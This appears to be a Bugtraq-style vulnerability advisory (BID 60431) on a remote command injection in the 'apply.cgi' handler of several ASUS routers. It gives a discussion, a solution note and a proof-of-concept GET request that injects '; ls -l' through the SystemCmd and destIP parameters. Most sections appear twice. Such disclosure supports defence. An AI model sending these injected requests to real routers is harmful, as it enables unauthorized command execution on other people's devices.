Multiple ASUS Routers 'apply.cgi' Remote Command Injection Vulnerability
BID:60431
Info
Multiple ASUS Routers 'apply.cgi' Remote Command Injection Vulnerability
| Bugtraq ID: | 60431 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 07 2013 12:00AM |
| Updated: | Apr 08 2014 12:57AM |
| Credit: | drone |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Multiple ASUS Routers 'apply.cgi' Remote Command Injection Vulnerability
Multiple ASUS Routers are prone to a remote command-injection vulnerability because it fails to properly sanitize user-supplied input.
Successfully exploiting this issue may allow an attacker to execute arbitrary commands in the context of the affected device.
Multiple ASUS Routers are prone to a remote command-injection vulnerability because it fails to properly sanitize user-supplied input.
Successfully exploiting this issue may allow an attacker to execute arbitrary commands in the context of the affected device.
Exploit / POC
Multiple ASUS Routers 'apply.cgi' Remote Command Injection Vulnerability
The following example request is available:
GET /apply.cgi?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=www.example3.com&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=ping+-c+5+%3B+ls+-l&firmver=3.0.0.4&cmdMethod=ping&destIP=%3B+ls+-l+.%2Fuser%2Fcgi-bin%2F&pingCNT=5 HTTP/1.1
Host: www.example.com
Proxy-Connection: keep-alive
Authorization: Basic ZGVmYXVsdA==
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36
Referer: http://www.example.com/Main_Analysis_Content.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
The following example request is available:
GET /apply.cgi?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=www.example3.com&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=ping+-c+5+%3B+ls+-l&firmver=3.0.0.4&cmdMethod=ping&destIP=%3B+ls+-l+.%2Fuser%2Fcgi-bin%2F&pingCNT=5 HTTP/1.1
Host: www.example.com
Proxy-Connection: keep-alive
Authorization: Basic ZGVmYXVsdA==
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36
Referer: http://www.example.com/Main_Analysis_Content.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Solution / Fix
Multiple ASUS Routers 'apply.cgi' Remote Command Injection Vulnerability
Solution:
Reportedly the issue is fixed, however Symantec has not confirmed this. Please contact the vendor for more information.
Solution:
Reportedly the issue is fixed, however Symantec has not confirmed this. Please contact the vendor for more information.
References
Multiple ASUS Routers 'apply.cgi' Remote Command Injection Vulnerability
References:
References: